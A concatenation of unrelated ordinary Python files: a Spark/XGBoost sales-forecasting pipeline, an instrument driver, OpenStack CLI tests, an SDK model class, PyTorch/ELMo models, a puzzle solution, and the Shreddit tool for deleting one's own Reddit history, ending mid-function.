def imread_collection(x, conserve_memory=True):
assert conserve_memory == False
assert x == '*.png'
|
from pyspark.ml import Pipeline
from pyspark.ml.evaluation import RegressionEvaluator
from pyspark.ml.feature import VectorAssembler, StringIndexer
from pyspark.ml.tuning import *
from pyspark.sql import DataFrame, SparkSession
from pyspark.sql.functions import udf, col, avg
from pyspark.sql.types import IntegerType, FloatType
from collections import namedtuple
import sys
import math
from pyspark_xgboost.xgboostestimator import XGBoostEstimator
SalesRecord = namedtuple("SalesRecord", ["storeId", "daysOfWeek", "date", "sales", "customers",
"open", "promo", "stateHoliday", "schoolHoliday"])
Store = namedtuple("Store", ["storeId", "storeType", "assortment", "competitionDistance",
"competitionOpenSinceMonth", "competitionOpenSinceYear", "promo2",
"promo2SinceWeek", "promo2SinceYear", "promoInterval"])
def parseStoreFile(storeFilePath):
isHeader = True
storeInstances = []
f = open(storeFilePath, "r")
for line in f.readlines():
if isHeader:
isHeader = False
else:
try:
strArray = line.split(",")
if len(strArray) == 10:
storeIdStr, storeTypeStr, assortmentStr, competitionDistanceStr,competitionOpenSinceMonthStr,\
competitionOpenSinceYearStr, promo2Str,promo2SinceWeekStr, promo2SinceYearStr, promoIntervalStr = line.split(",")
store = Store(int(storeIdStr), storeTypeStr, assortmentStr,
-1 if (competitionDistanceStr == "") else int(competitionDistanceStr),
-1 if (competitionOpenSinceMonthStr == "") else int(competitionOpenSinceMonthStr),
-1 if (competitionOpenSinceYearStr == "") else int(competitionOpenSinceYearStr),
int(promo2Str),
-1 if (promo2Str == "0") else int(promo2SinceWeekStr),
-1 if (promo2Str == "0") else int(promo2SinceYearStr),
promoIntervalStr.replace("\"", ""))
storeInstances.append(store)
else:
storeIdStr, storeTypeStr, assortmentStr, competitionDistanceStr,\
competitionOpenSinceMonthStr, competitionOpenSinceYearStr, promo2Str,\
promo2SinceWeekStr, promo2SinceYearStr, firstMonth, secondMonth, thirdMonth,\
forthMonth = line.split(",")
store = Store(int(storeIdStr), storeTypeStr, assortmentStr,
-1 if (competitionDistanceStr == "") else int(competitionDistanceStr),
-1 if (competitionOpenSinceMonthStr == "") else int(competitionOpenSinceMonthStr),
-1 if (competitionOpenSinceYearStr == "") else int(competitionOpenSinceYearStr),
int(promo2Str),
-1 if (promo2Str == "0") else int(promo2SinceWeekStr),
-1 if (promo2Str == "0") else int(promo2SinceYearStr),
firstMonth.replace("\"", "") + "," + secondMonth + "," + thirdMonth + "," + \
forthMonth.replace("\"", ""))
storeInstances.append(store)
except Exception as e:
print(e)
sys.exit(1)
f.close()
return storeInstances
def parseTrainingFile(trainingPath):
isHeader = True
records = []
f = open(trainingPath, "r")
for line in f.readlines():
if isHeader:
isHeader = False
else:
storeIdStr, daysOfWeekStr, dateStr, salesStr, customerStr, openStr, promoStr,\
stateHolidayStr, schoolHolidayStr = line.split(",")
salesRecord = SalesRecord(int(storeIdStr), int(daysOfWeekStr), dateStr,
int(salesStr), int(customerStr), int(openStr), int(promoStr), stateHolidayStr,
schoolHolidayStr)
records.append(salesRecord)
f.close()
return records
def featureEngineering(ds):
stateHolidayIndexer = StringIndexer()\
.setInputCol("stateHoliday")\
.setOutputCol("stateHolidayIndex")
schoolHolidayIndexer = StringIndexer()\
.setInputCol("schoolHoliday")\
.setOutputCol("schoolHolidayIndex")
storeTypeIndexer = StringIndexer()\
.setInputCol("storeType")\
.setOutputCol("storeTypeIndex")
assortmentIndexer = StringIndexer()\
.setInputCol("assortment")\
.setOutputCol("assortmentIndex")
promoInterval = StringIndexer()\
.setInputCol("promoInterval")\
.setOutputCol("promoIntervalIndex")
filteredDS = ds.filter(ds.sales > 0).filter(ds.open > 0)
# parse date
dateUdf = udf(lambda dateStr: int(dateStr.split("-")[2]), IntegerType())
dsWithDayCol = filteredDS.withColumn("day", dateUdf(col("date")))
monthUdf = udf(lambda dateStr: int(dateStr.split("-")[1]), IntegerType())
dsWithMonthCol = dsWithDayCol.withColumn("month", monthUdf(col("date")))
yearUdf = udf(lambda dateStr: int(dateStr.split("-")[0]), IntegerType())
dsWithYearCol = dsWithMonthCol.withColumn("year", yearUdf(col("date")))
salesUdf = udf(lambda sales: math.log(sales), FloatType())
dsWithLogSales = dsWithYearCol.withColumn("logSales", salesUdf(col("sales")))
# fill with mean values
meanCompetitionDistance = float(dsWithLogSales.select(avg("competitionDistance")).first()[0])
print("===={}".format(meanCompetitionDistance))
distanceUdf = udf(lambda distance: float(distance) if (distance > 0) else meanCompetitionDistance, FloatType())
finalDS = dsWithLogSales.withColumn("transformedCompetitionDistance",
distanceUdf(col("competitionDistance")))
vectorAssembler = VectorAssembler()\
.setInputCols(["storeId", "daysOfWeek", "promo", "competitionDistance", "promo2", "day",
"month", "year", "transformedCompetitionDistance", "stateHolidayIndex",
"schoolHolidayIndex", "storeTypeIndex", "assortmentIndex", "promoIntervalIndex"])\
.setOutputCol("features")
pipeline = Pipeline(stages=[stateHolidayIndexer, schoolHolidayIndexer,
storeTypeIndexer, assortmentIndexer,promoInterval, vectorAssembler])
return pipeline.fit(finalDS)\
.transform(finalDS).\
drop("stateHoliday", "schoolHoliday", "storeType", "assortment", "promoInterval", "sales",
"promo2SinceWeek", "customers", "promoInterval", "competitionOpenSinceYear",
"competitionOpenSinceMonth", "promo2SinceYear", "competitionDistance", "date")
def crossValidation(xgboostParam, trainingData):
xgbEstimator = XGBoostEstimator(xgboostParam)\
.setFeaturesCol("features")\
.setLabelCol("logSales")
paramGrid = ParamGridBuilder() \
.addGrid(xgbEstimator.num_round, [20, 50])\
.addGrid(xgbEstimator.eta, [0.1, 0.4])\
.build()
tv = TrainValidationSplit()\
.setEstimator(xgbEstimator)\
.setEvaluator(RegressionEvaluator().setLabelCol("logSales"))\
.setEstimatorParamMaps(paramGrid)\
.setTrainRatio(0.8)
return tv.fit(trainingData)
def main(trainingPath, storeFilePath):
sparkSession = SparkSession.builder.appName("rosseman").getOrCreate()
allSalesRecords = parseTrainingFile(trainingPath)
salesRecordsDF = sparkSession.createDataFrame(allSalesRecords)
allStores = parseStoreFile(storeFilePath)
storesDS = sparkSession.createDataFrame(allStores)
fullDataset = salesRecordsDF.join(storesDS, "storeId")
featureEngineeredDF = featureEngineering(fullDataset)
params = {}
params["eta"] = 0.1
params["max_depth"] = 6
params["silent"] = 1
params["ntreelimit"] = 1000
params["objective"] = "reg:linear"
params["subsample"] = 0.8
params["num_round"] = 100
bestModel = crossValidation(params, featureEngineeredDF)
return bestModel
if __name__ == "__main__":
bestModel = main(sys.argv[1], sys.argv[2])
|
import logging
from qcodes.instrument.parameter import Parameter, ManualParameter
from qcodes.utils.validators import Enum
from .FEMTO_OE300_base import (OE300State, OE300Error, LOW_NOISE_GAINS, HIGH_SPEED_GAINS,
LP_SETTINGS, COUPLING_MODES, GAIN_SETTINGS, ERROR_TABLE,
OE300Base)
log = logging.getLogger(__name__)
class OE300BaseParam(Parameter):
def __init__(self, name, instrument, vals, nbits, **kwargs):
super().__init__(name=name, instrument=instrument, vals=vals, **kwargs)
self._raw_value = 0
self._nbits = nbits
def get_raw(self): # pylint: disable=method-hidden
return self.raw_value_to_value(self._raw_value)
def set_raw(self, value): # pylint: disable=method-hidden
self._raw_value = self.value_to_raw_value(value)
def value_to_raw_value(self, value):
return self.vals._valid_values.index(value)
def raw_value_to_value(self, raw_value):
return self.vals._valid_values[raw_value]
def make_bits(self):
return f'{self._raw_value:0{self._nbits}b}'
class OE300GainMode(OE300BaseParam):
def set_raw(self, value): # pylint: disable=method-hidden
gains = LOW_NOISE_GAINS if value == 'L' else HIGH_SPEED_GAINS
self._instrument.gain.vals = Enum(*gains)
super().set_raw(value)
class OE300Manual(OE300Base):
"""
A driver for the FEMTO OE300 photodiode, controlled manually.
"""
def __init__(self, name, cal_path=None, prefactor=1, **kwargs):
super().__init__(name, cal_path, prefactor, **kwargs)
self.add_parameter('gain',
label='Gain',
vals=Enum(*LOW_NOISE_GAINS),
nbits=3,
parameter_class=OE300BaseParam)
self.add_parameter('coupling',
label='Coupling',
vals=Enum(*COUPLING_MODES),
nbits=1,
parameter_class=OE300BaseParam)
self.add_parameter('gain_mode',
label='Gain mode',
vals=Enum(*GAIN_SETTINGS),
nbits=1,
parameter_class=OE300GainMode)
self.add_parameter('lp_filter_bw',
label='Lowpass filter bandwidth',
vals=Enum(*LP_SETTINGS),
nbits=2,
parameter_class=OE300BaseParam)
log.info('Manually controlled OE300 initialization complete')
def get_idn(self):
vendor = 'FEMTO'
model = None
serial = None
firmware = None
return {'vendor': vendor, 'model': model,
'serial': serial, 'firmware': firmware}
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from oslo_config import fixture as config_fixture
from oslotest import output
import six
import testtools
from placement.cmd import manage
from placement import conf
class TestCommandParsers(testtools.TestCase):
def setUp(self):
super(TestCommandParsers, self).setUp()
self.conf = cfg.ConfigOpts()
conf_fixture = config_fixture.Config(self.conf)
self.useFixture(conf_fixture)
conf.register_opts(conf_fixture.conf)
# Quiet output from argparse (used within oslo_config).
# If you are debugging, commenting this out might be useful.
self.output = self.useFixture(
output.CaptureOutput(do_stderr=True, do_stdout=True))
# We don't use a database, but we need to set the opt as
# it's required for a valid config.
conf_fixture.config(group="placement_database", connection='sqlite://')
command_opts = manage.setup_commands(conf_fixture)
# Command line opts must be registered on the conf_fixture, otherwise
# they carry over globally.
conf_fixture.register_cli_opts(command_opts)
def test_commands_associated(self):
"""Test that commands get parsed as desired.
This leaves out --version, which is built into oslo.config's handling.
"""
for command, args in [
('db_version', ['db', 'version']),
('db_sync', ['db', 'sync']),
('db_stamp', ['db', 'stamp', 'b4ed3a175331']),
('db_online_data_migrations',
['db', 'online_data_migrations'])]:
with mock.patch('placement.cmd.manage.DbCommands.' +
command) as mock_command:
self.conf(args, default_config_files=[])
self.conf.command.func()
mock_command.assert_called_once_with()
def test_non_command(self):
"""A non-existent command should fail."""
self.assertRaises(SystemExit,
self.conf, ['pony'], default_config_files=[])
def test_empty_command(self):
"""An empty command should create no func."""
# Python 2.7 and 3.x behave differently here, but the result is
# satisfactory. Both result in some help output, but the Python 3
# help is better.
def parse_conf():
self.conf([], default_config_files=[])
def get_func():
return self.conf.command.func
if six.PY2:
self.assertRaises(SystemExit, parse_conf)
else:
parse_conf()
self.assertRaises(cfg.NoSuchOptError, get_func)
def test_too_many_args(self):
self.assertRaises(SystemExit,
self.conf, ['version', '5'], default_config_files=[])
self.output.stderr.seek(0)
self.assertIn("choose from 'db'", self.output.stderr.read())
def test_help_message(self):
"""Test that help output for sub commands shows right commands."""
# This is noisy because we have different 'help' behaviors in
# Python 2 and 3.
if six.PY2:
self.assertRaises(SystemExit, self.conf, ['db'],
default_config_files=[])
else:
self.conf(['db'], default_config_files=[])
self.conf.command.func()
self.output.stdout.seek(0)
self.output.stderr.seek(0)
if six.PY2:
self.assertIn('{sync,version,stamp,online_data_migrations}',
self.output.stderr.read())
else:
self.assertIn('{sync,version,stamp,online_data_migrations}',
self.output.stdout.read())
class TestDBCommands(testtools.TestCase):
def setUp(self):
super(TestDBCommands, self).setUp()
self.conf = cfg.ConfigOpts()
conf_fixture = config_fixture.Config(self.conf)
self.useFixture(conf_fixture)
conf.register_opts(conf_fixture.conf)
conf_fixture.config(group="placement_database", connection='sqlite://')
command_opts = manage.setup_commands(conf_fixture)
conf_fixture.register_cli_opts(command_opts)
self.output = self.useFixture(
output.CaptureOutput(do_stderr=True, do_stdout=True))
def _command_setup(self, max_count=None):
command_list = ["db", "online_data_migrations"]
if max_count is not None:
command_list.extend(["--max-count", str(max_count)])
self.conf(command_list,
project='placement',
default_config_files=None)
return manage.DbCommands(self.conf)
def test_online_migrations(self):
# Mock two online migrations
mock_mig1 = mock.MagicMock(__name__="mock_mig_1")
mock_mig2 = mock.MagicMock(__name__="mock_mig_2")
mock_mig1.side_effect = [(10, 10), (0, 0)]
mock_mig2.side_effect = [(15, 15), (0, 0)]
mock_migrations = (mock_mig1, mock_mig2)
with mock.patch('placement.cmd.manage.online_migrations',
new=mock_migrations):
commands = self._command_setup()
commands.db_online_data_migrations()
expected = '''\
Running batches of 50 until complete
10 rows matched query mock_mig_1, 10 migrated
15 rows matched query mock_mig_2, 15 migrated
+------------+-------------+-----------+
| Migration | Total Found | Completed |
+------------+-------------+-----------+
| mock_mig_1 | 10 | 10 |
| mock_mig_2 | 15 | 15 |
+------------+-------------+-----------+
'''
self.output.stdout.seek(0)
self.assertEqual(expected, self.output.stdout.read())
def test_online_migrations_error(self):
good_remaining = [50]
def good_migration(context, count):
found = good_remaining[0]
done = min(found, count)
good_remaining[0] -= done
return found, done
bad_migration = mock.MagicMock()
bad_migration.side_effect = Exception("Mock Exception")
bad_migration.__name__ = 'bad'
mock_migrations = (bad_migration, good_migration)
with mock.patch('placement.cmd.manage.online_migrations',
new=mock_migrations):
# bad_migration raises an exception, but it could be because
# good_migration had not completed yet. We should get 1 in this
# case, because some work was done, and the command should be
# reiterated.
commands = self._command_setup(max_count=50)
self.assertEqual(1, commands.db_online_data_migrations())
# When running this for the second time, there's no work left for
# good_migration to do, but bad_migration still fails - should
# get 2 this time.
self.assertEqual(2, commands.db_online_data_migrations())
# When --max-count is not used, we should get 2 if all possible
# migrations completed but some raise exceptions
commands = self._command_setup()
good_remaining = [125]
self.assertEqual(2, commands.db_online_data_migrations())
def test_online_migrations_bad_max(self):
commands = self._command_setup(max_count=-2)
self.assertEqual(127, commands.db_online_data_migrations())
commands = self._command_setup(max_count="a")
self.assertEqual(127, commands.db_online_data_migrations())
commands = self._command_setup(max_count=0)
self.assertEqual(127, commands.db_online_data_migrations())
def test_online_migrations_no_max(self):
with mock.patch('placement.cmd.manage.DbCommands.'
'_run_online_migration') as rm:
rm.return_value = {}, False
commands = self._command_setup()
self.assertEqual(0, commands.db_online_data_migrations())
def test_online_migrations_finished(self):
with mock.patch('placement.cmd.manage.DbCommands.'
'_run_online_migration') as rm:
rm.return_value = {}, False
commands = self._command_setup(max_count=5)
self.assertEqual(0, commands.db_online_data_migrations())
def test_online_migrations_not_finished(self):
with mock.patch('placement.cmd.manage.DbCommands.'
'_run_online_migration') as rm:
rm.return_value = {'mig': (10, 5)}, False
commands = self._command_setup(max_count=5)
self.assertEqual(1, commands.db_online_data_migrations())
|
#!/usr/bin/env python3
"""
Make a Windows batch file for building ca65 Pently.
Usage:
make clean && make -n COMSPEC=cmd pently.nes | tools/makewinbuild.py
"""
import sys
prolog = """@echo off
echo Building from batch file
@echo on
"""
linesuffix = " || goto :error\n"
epilog = """goto EOF
:error
echo Failed with error #%errorlevel%.
pause
"""
lines = [prolog]
for line in sys.stdin:
words = line.split()
if words[0] in ("touch", "rm") or words[0].startswith("make["):
continue
if words[0] == "python3":
words[0] = "py -3"
if words[0] == "cat":
lpart, rpart = line.replace("/", "\\").split(">", 1)
words = lpart.split()
words = ["copy /b", "+".join(words[1:]), rpart.strip()]
lines.append(" ".join(words) + linesuffix)
lines.append(epilog)
with open("winbuild.bat", "w", newline="\r\n") as outfp:
outfp.writelines(lines)
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class UpgradeDatabaseDetails(object):
"""
Details for upgrading a database to a specific Oracle Database version.
"""
#: A constant which can be used with the action property of a UpgradeDatabaseDetails.
#: This constant has a value of "PRECHECK"
ACTION_PRECHECK = "PRECHECK"
#: A constant which can be used with the action property of a UpgradeDatabaseDetails.
#: This constant has a value of "UPGRADE"
ACTION_UPGRADE = "UPGRADE"
#: A constant which can be used with the action property of a UpgradeDatabaseDetails.
#: This constant has a value of "ROLLBACK"
ACTION_ROLLBACK = "ROLLBACK"
def __init__(self, **kwargs):
"""
Initializes a new UpgradeDatabaseDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param action:
The value to assign to the action property of this UpgradeDatabaseDetails.
Allowed values for this property are: "PRECHECK", "UPGRADE", "ROLLBACK"
:type action: str
:param database_upgrade_source_details:
The value to assign to the database_upgrade_source_details property of this UpgradeDatabaseDetails.
:type database_upgrade_source_details: oci.database.models.DatabaseUpgradeSourceBase
"""
self.swagger_types = {
'action': 'str',
'database_upgrade_source_details': 'DatabaseUpgradeSourceBase'
}
self.attribute_map = {
'action': 'action',
'database_upgrade_source_details': 'databaseUpgradeSourceDetails'
}
self._action = None
self._database_upgrade_source_details = None
@property
def action(self):
"""
**[Required]** Gets the action of this UpgradeDatabaseDetails.
The database upgrade action.
Allowed values for this property are: "PRECHECK", "UPGRADE", "ROLLBACK"
:return: The action of this UpgradeDatabaseDetails.
:rtype: str
"""
return self._action
@action.setter
def action(self, action):
"""
Sets the action of this UpgradeDatabaseDetails.
The database upgrade action.
:param action: The action of this UpgradeDatabaseDetails.
:type: str
"""
allowed_values = ["PRECHECK", "UPGRADE", "ROLLBACK"]
if not value_allowed_none_or_none_sentinel(action, allowed_values):
raise ValueError(
"Invalid value for `action`, must be None or one of {0}"
.format(allowed_values)
)
self._action = action
@property
def database_upgrade_source_details(self):
"""
Gets the database_upgrade_source_details of this UpgradeDatabaseDetails.
:return: The database_upgrade_source_details of this UpgradeDatabaseDetails.
:rtype: oci.database.models.DatabaseUpgradeSourceBase
"""
return self._database_upgrade_source_details
@database_upgrade_source_details.setter
def database_upgrade_source_details(self, database_upgrade_source_details):
"""
Sets the database_upgrade_source_details of this UpgradeDatabaseDetails.
:param database_upgrade_source_details: The database_upgrade_source_details of this UpgradeDatabaseDetails.
:type: oci.database.models.DatabaseUpgradeSourceBase
"""
self._database_upgrade_source_details = database_upgrade_source_details
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
import numpy as np
import re
def main():
grid = np.zeros((1000,1000))
countCollision = 0
filename = 'day3_1_input.txt'
claims = []
userInput = open(filename, 'r')
for line in userInput:
#print(line)
m = re.search("\\#(\d+) \\@ (\d+),(\d+): (\d+)x(\d+)", line)
idx = int(m.group(1))
startX = int(m.group(2))
startY = int(m.group(3))
sizeX = int(m.group(4))
sizeY = int(m.group(5))
claims.append(idx)
#print ("startX", startX)
#print ("startY", startY)
#print ("sizeX", sizeX)
#print ("sizeY", sizeY)
for x in range(startX,startX + sizeX):
for y in range(startY,startY + sizeY):
if (grid[x][y] != 0):
if idx in claims:
claims.remove(idx)
if grid[x][y] in claims:
claims.remove(grid[x][y])
grid[x][y] = idx
print (claims)
main()
|
import json
import torch
import numpy as np
from . import utils
from PIL import Image
from torch.utils.data.dataset import Dataset
from pathlib import Path
class DataLoaderRBV(Dataset):
def __init__(self, folder_path, use_gt):
super(DataLoaderRBV, self).__init__()
self.info_files = list(Path(folder_path).glob("**/info.json"))
self.label_files = []
for info_file in self.info_files:
filename = "gray_mask.png" if use_gt else "predicted_mask.png"
self.label_files.append(
info_file.parent / Path(filename)
)
def __getitem__(self, index):
info_path = self.info_files[index]
label_path = self.label_files[index]
with open(info_path) as f:
rbv8 = np.asarray(json.load(f)["norm_rbv"])
label = utils.process_label(Image.open(label_path))
# Generate 1x1, 2x2, 4x4 RBVs from 8x8
rbv1, rbv2, rbv4 = utils.downsample_rbv(rbv8)
rbv1 = torch.from_numpy(rbv1).flatten().float()
rbv2 = torch.from_numpy(rbv2).flatten().float()
rbv4 = torch.from_numpy(rbv4).flatten().float()
rbv8 = torch.from_numpy(rbv8).flatten().float()
return label, rbv1, rbv2, rbv4, rbv8
def __len__(self):
return len(self.info_files)
|
import torch
import torch.nn as nn
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from allennlp.modules.elmo import Elmo, batch_to_ids
options_file = "https://s3-us-west-2.amazonaws.com/allennlp/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_options.json"
weight_file = "https://s3-us-west-2.amazonaws.com/allennlp/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_weights.hdf5"
class SeqModel_Elmo(nn.Module):
def __init__(self, num_labels, extractor_type, hidden_dim, if_attn):
super(SeqModel_Elmo, self).__init__()
self.if_attn = if_attn
self.elmoLayer = ElmoLayer(options_file, weight_file)
self.featureEncoder = FeatureEncoder(input_dim=2048, extractor_type= extractor_type, hidden_dim =hidden_dim)
if self.if_attn:
self.attention = Attention(hidden_dim)
self.score_layer = nn.Sequential(
nn.Linear(hidden_dim, 12),
nn.LayerNorm(12),
nn.Linear(12, num_labels),
)
def forward(self, words):
emb_sequence, mask = self.elmoLayer(words)
features = self.featureEncoder(emb_sequence, mask) # emb_sequence shape: [batch_size, max_seq_len, emb_dim] => [128, 50, 100]
if self.if_attn:
features, att_weights = self.attention(features, mask.float())
else:
att_weights = None
scores = self.score_layer(features) # features shape: [batch_size, max_seq_len, hidden_dim] => [128, 50, 32]
return scores, mask, att_weights # score shape: [batch_size, max_seq_len, num_labels] => [128, 50, 3]
class ElmoLayer(nn.Module):
def __init__(self,options_file, weight_file):
super(ElmoLayer, self).__init__()
self.elmo = Elmo(options_file, weight_file, 2, dropout=0.3)
def forward(self, words):
character_ids = batch_to_ids(words)
elmo_output = self.elmo(character_ids)
elmo_representation = torch.cat(elmo_output['elmo_representations'], -1)
mask = elmo_output['mask']
return elmo_representation, mask
class FeatureEncoder(nn.Module):
def __init__(self, input_dim, extractor_type, hidden_dim):
super(FeatureEncoder, self).__init__()
self.extractor_type = extractor_type
self.hidden_dim = hidden_dim
if self.extractor_type == 'lstm':
self.lstm = nn.LSTM(input_dim, self.hidden_dim//2, num_layers=2, batch_first=True, bidirectional=True)
self.dropout = nn.Dropout(0.4)
def forward(self, sequences, mask):
"""
:param sequences: sequence shape: [batch_size, seq_len, emb_dim] => [128, 44, 100]
:param mask:
:return:
"""
if self.extractor_type == 'lstm':
lengths = torch.sum(mask, 1) # sum up all 1 values which is equal to the lenghts of sequences
lengths, order = lengths.sort(0, descending=True)
recover = order.sort(0, descending=False)[1]
sequences = sequences[order]
packed_words = pack_padded_sequence(sequences, lengths.cpu().numpy(), batch_first=True)
lstm_out, hidden = self.lstm(packed_words, None)
feats, _ = pad_packed_sequence(lstm_out)
feats = feats.permute(1, 0, 2)
feats = feats[recover] # feat shape: [batch_size, seq_len, hidden_dim] => [128, 44, 32]
return feats
class Attention(nn.Module):
"""Attention mechanism written by Gustavo Aguilar https://github.com/gaguilar"""
def __init__(self, hidden_size):
super(Attention, self).__init__()
self.da = hidden_size
self.dh = hidden_size
self.W = nn.Linear(self.dh, self.da) # (feat_dim, attn_dim)
self.v = nn.Linear(self.da, 1) # (attn_dim, 1)
def forward(self, inputs, mask):
# Raw scores
u = self.v(torch.tanh(self.W(inputs))) # (batch, seq, hidden) -> (batch, seq, attn) -> (batch, seq, 1)
# Masked softmax
u = u.exp() # exp to calculate softmax
u = mask.unsqueeze(2).float() * u # (batch, seq, 1) * (batch, seq, 1) to zerout out-of-mask numbers
sums = torch.sum(u, dim=1, keepdim=True) # now we are sure only in-mask values are in sum
a = u / sums # the probability distribution only goes to in-mask values now
# Weighted vectors
z = inputs * a
return z, a.view(inputs.size(0), inputs.size(1))
|
import arrow
import json
import logging
import os
import praw
import time
from praw.models import Comment, Submission
from prawcore.exceptions import ResponseException, OAuthException, BadRequest, Forbidden
from essential_generators import DocumentGenerator
from re import sub
from shreddit.util import ShredditError
from itertools import chain
generator = DocumentGenerator()
class Shredder:
"""This class stores state for configuration, API objects, logging, etc.
It exposes a shred() method that application code can call to start it.
"""
def __init__(self, config, user):
logging.basicConfig()
self._logger = logging.getLogger("shreddit")
self._logger.setLevel(
level=logging.DEBUG if config.get("verbose", True) else logging.INFO
)
self.__dict__.update({f"_{k}": config[k] for k in config})
if not isinstance(self._sort, list):
self._sort = [self._sort]
self._user = user
self._connect()
if self._save_directory:
self._r.config.store_json_result = True
self._recent_cutoff = arrow.now().shift(hours=-self._hours)
self._nuke_cutoff = arrow.now().shift(hours=-self._nuke_hours)
if self._save_directory:
if not os.path.exists(self._save_directory):
os.makedirs(self._save_directory)
# Add any multireddit subreddits to the whitelist
self._whitelist = {s.lower() for s in self._whitelist}
for username, multiname in self._multi_whitelist:
multireddit = self._r.multireddit(username, multiname)
for subreddit in multireddit.subreddits:
self._whitelist.add(str(subreddit).lower())
# Add any multireddit subreddits to the blacklist
self._blacklist = set()
for username, multiname in self._multi_blacklist:
multireddit = self._r.multireddit(username, multiname)
for subreddit in multireddit.subreddits:
self._blacklist.add(str(subreddit).lower())
self._logger.info(f"Deleting ALL items before {self._nuke_cutoff}")
self._logger.info(
f"Deleting items not whitelisted until {self._recent_cutoff}"
)
self._logger.info(f"Ignoring ALL items after {self._recent_cutoff}")
self._logger.info(f"Targeting {self._item} sorted by {self._sort}")
if self._blacklist:
self._logger.info(
"Deleting ALL items from subreddits {}".format(
", ".join(list(self._blacklist))
)
)
if self._whitelist:
self._logger.info(
"Keeping items from subreddits {}".format(
", ".join(list(self._whitelist))
)
)
if self._keep_a_copy and self._save_directory:
self._logger.info(
f"Saving deleted items to: {self._save_directory}"
)
if self._trial_run:
self._logger.info("Trial run - no deletion will be performed")
def shred(self):
deleted = self._remove_things(self._build_iterator())
self._logger.info(f"Finished deleting {deleted} items. ")
if deleted >= 1000:
# This user has more than 1000 items to handle, which angers the gods of the Reddit API. So chill for a
# while and do it again.
self._logger.info(
f"Waiting {self._batch_cooldown} seconds and continuing..."
)
time.sleep(self._batch_cooldown)
self._connect()
self.shred()
def _connect(self):
try:
self._r = praw.Reddit(
self._user, check_for_updates=False, user_agent="python:shreddit:v6.0.4"
)
self._logger.info(f"Logged in as {self._r.user.me()}.")
except ResponseException:
raise ShredditError("Bad OAuth credentials")
except OAuthException:
raise ShredditError("Bad username or password")
def _check_whitelist(self, item):
"""Returns True if the item is whitelisted, False otherwise.
"""
if (
str(item.subreddit).lower() in self._whitelist
or item.id in self._whitelist_ids
):
return True
if self._whitelist_distinguished and item.distinguished:
return True
if self._whitelist_gilded and item.gilded:
return True
if self._max_score is not None and item.score > self._max_score:
return True
return False
def _save_item(self, item):
name = item.subreddit_name_prefixed[2:]
path = f"{item.author}/{name}/{item.id}.json"
if not os.path.exists(
os.path.join(self._save_directory, os.path.dirname(path))
):
os.makedirs(os.path.join(self._save_directory, os.path.dirname(path)))
with open(os.path.join(self._save_directory, path), "w") as fh:
# This is a temporary replacement for the old .json_dict property:
output = {
k: item.__dict__[k] for k in item.__dict__ if not k.startswith("_")
}
output["subreddit"] = output["subreddit"].title
output["author"] = output["author"].name
json.dump(output, fh, indent=2)
def _remove_submission(self, sub):
self._logger.info(
"Deleting submission: #{id} {url}".format(
id=sub.id, url=sub.url.encode("utf-8")
)
)
def _remove_comment(self, comment):
if self._replacement_format == "random":
replacement_text = generator.sentence()
elif self._replacement_format == "dot":
replacement_text = "."
else:
replacement_text = self._replacement_format
short_text = sub(b"\n\r\t", " ", comment.body[:35].encode("utf-8"))
msg = f"/r/{comment.subreddit}/ #{comment.id} ({short_text}) with: '{replacement_text}'"
self._logger.debug(f"Editing and deleting {msg}")
if not self._trial_run:
comment.edit(replacement_text)
def _remove(self, item):
if self._keep_a_copy and self._save_directory:
self._save_item(item)
if not self._trial_run:
if self._clear_vote:
try:
item.clear_vote()
except BadRequest:
self._logger.debug(
f"Couldn't clear vote on {item}"
)
try:
if isinstance(item, Submission):
self._remove_submission(item)
elif isinstance(item, Comment):
self._remove_comment(item)
if not self._trial_run:
item.delete()
except Forbidden:
self._logger.debug(f"Got HTTP Forbidden error trying to remove {item}, skipping.")
def _remove_things(self, items):
self._logger.info("Loading items to delete...")
to_delete = [item for item in items]
self._logger.info(
"Done. Starting on batch of {} items...".format(len(to_delete))
)
count, count_removed = 0, 0
for item in to_delete:
count += 1
self._logger.debug(f"Examining item {count}: {item}")
created = arrow.get(item.created_utc)
if str(item.subreddit).lower() in self._blacklist:
self._logger.debug("Deleting due to blacklist")
count_removed += 1
self._remove(item)
elif created <= self._nuke_cutoff:
self._logger.debug("Item occurs prior to nuke cutoff")
count_removed += 1
self._remove(item)
elif self._check_whitelist(item):
self._logger.debug("Skipping due to: whitelisted")
continue
elif created > self._recent_cutoff:
self._logger.debug("Skipping due to: too recent")
continue
else:
count_removed += 1
self._remove(item)
return count_removed
def _build_iterator(self):
user = self._r.user.me()
listings = []
iterators = []
if self._item == "comments":
listings.append(user.comments)
elif self._item == "submitted":
listings.append(user.submissions)
elif self._item == "overview":
listings.extend([user.comments, user.submissions])
for listing in listings:
for sort in self._sort:
if sort == "new":
iterators.append(listing.new(limit=None))
elif sort == "top":
iterators.append(listing.top(limit=None))
elif sort == "hot":
iterators.append(listing.hot(limit=None))
elif sort == "controversial":
iterators.append(listing.controversial(limit=None))
else:
raise ShredditError(f'Sorting "{self._sort}" not recognized.')
return chain.from_iterable(iterators)
|
import logging, os, re, sys
from code.utils.basic_utils import check_output_and_run
import pprint as pp
def run_fanngo(config):
workdir=config["input"]["gomap_dir"]+"/"
fanngo_sw_conf = config["data"]["mixed-method"]["fanngo"]
fanngo_conf = config["software"]["fanngo"]
